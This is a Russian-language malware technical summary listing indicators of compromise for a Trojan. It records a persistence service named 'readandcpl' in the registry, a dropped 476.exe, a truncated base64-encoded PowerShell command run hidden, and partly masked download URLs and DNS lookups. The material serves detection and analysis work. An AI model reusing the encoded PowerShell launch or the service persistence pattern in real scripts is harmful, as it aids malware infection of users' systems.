Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\readandcpl] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\readandcpl] 'ImagePath' = '"%WINDIR%\SysWOW64\readandcpl.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABZAHkAdAB3AHMAYgBoAHoAegBvAD0AJwBVAHgAcABjAHkAYQBhAGQAJwA7ACQARgB4AGkAdQBlAHIAegBpAHIAbgAgAD0AIAAnADQANwA2ACcAOwAkAEEAegB4AGYAdQB1AGkAbAB0AD0AJwBUAHoAeQBwAGIAbwB2AHIAawBxACcAOwAkAFEAZAB...
- %HOMEPATH%\476.exe
- %HOMEPATH%\476.exe в %WINDIR%\syswow64\readandcpl.exe
- http://ve#####ongnghiepqd.com/wp-content/2ff6395/
- http://11#.#19.233.65/nsip/jit/ringin/
- DNS ASK th####pprint.com
- DNS ASK ve#####ongnghiepqd.com
- '%HOMEPATH%\476.exe'
- '%WINDIR%\syswow64\readandcpl.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABZAHkAdAB3AHMAYgBoAHoAegBvAD0AJwBVAHgAcABjAHkAYQBhAGQAJwA7ACQARgB4AGkAdQBlAHIAegBpAHIAbgAgAD0AIAAnADQANwA2ACcAOwAkAEEAegB4AGYAdQB1AGkAbAB0AD0AJwBUAHoAeQBwAGIAbwB2AHIAawBxACcAOwAkAFEAZAB...' (со скрытым окном)